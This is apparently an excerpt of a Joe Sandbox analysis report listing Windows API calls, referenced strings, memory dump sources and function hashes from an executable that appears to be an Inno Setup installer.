                                                                                                                                        • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                                        • LocalFree.KERNEL32(0074EAB0,00000000,00401B68), ref: 00401ACF
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,0074EAB0,00000000,00401B68), ref: 00401AEE
                                                                                                                                        • LocalFree.KERNEL32(0074FAB0,?,00000000,00008000,0074EAB0,00000000,00401B68), ref: 00401B2D
                                                                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                                        • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 3782394904-2249551878
                                                                                                                                        • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                        • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                                        • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                        • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                                                                          • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                                                                        Strings
                                                                                                                                        • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                                                                        • Deleting directory: %s, xrefs: 00459E5B
                                                                                                                                        • Stripped read-only attribute., xrefs: 00459E94
                                                                                                                                        • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                                                                        • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                                                                        • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                                                                        • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorFindLast
                                                                                                                                        • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                                        • API String ID: 754982922-1448842058
                                                                                                                                        • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                                                        • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                                                                        • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                                                        • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                                                        APIs
                                                                                                                                        • GetCapture.USER32 ref: 00422EA4
                                                                                                                                        • GetCapture.USER32 ref: 00422EB3
                                                                                                                                        • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                                                                        • ReleaseCapture.USER32 ref: 00422EBE
                                                                                                                                        • GetActiveWindow.USER32 ref: 00422ECD
                                                                                                                                        • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                                                                        • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                                                                        • GetActiveWindow.USER32 ref: 00422FBF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 862346643-0
                                                                                                                                        • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                                        • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                                                                        • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                                        • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                                                                        • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                                                                        • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveLong$Message
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2785966331-0
                                                                                                                                        • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                                        • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                                                                        • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                                        • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0042948A
                                                                                                                                        • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1583807278-0
                                                                                                                                        • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                                        • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                                                                        • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                                        • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                                                        • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                                                        • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                                                        • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 225703358-0
                                                                                                                                        • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                                                        • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                                                                        • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                                                        • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                                                                        • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$Load
                                                                                                                                        • String ID: $ $Internal error: Item already expanding
                                                                                                                                        • API String ID: 1675784387-1948079669
                                                                                                                                        • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                                        • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                                                                        • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                                        • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                                                                        APIs
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                                                        • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                        • API String ID: 390214022-3304407042
                                                                                                                                        • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                                        • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                                                                        • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                                        • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                                                                        APIs
                                                                                                                                        • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                                                                        • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassInfoLongMessageSendWindow
                                                                                                                                        • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                                        • API String ID: 3391662889-4234151509
                                                                                                                                        • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                                                        • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                                                                        • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                                                        • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                                                                          • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                                          • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale$DefaultSystem
                                                                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                        • API String ID: 1044490935-665933166
                                                                                                                                        • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                                                        • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                                                                        • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                                                        • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                                                                        • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                                                                          • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                                                                        • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                                                                          • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                                                                        • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                        • String ID: ,$?
                                                                                                                                        • API String ID: 2359071979-2308483597
                                                                                                                                        • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                                        • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                                                                        • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                                        • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                                                                        APIs
                                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1030595962-0
                                                                                                                                        • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                                        • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                                                                        • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                                        • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                                                                        APIs
                                                                                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                                                                        • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                                                                        • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                                                                        • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2222416421-0
                                                                                                                                        • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                                        • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                                                                        • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                                        • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                                                                          • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                                                                          • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                          • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                                                                        • TranslateMessage.USER32(?), ref: 004573B3
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
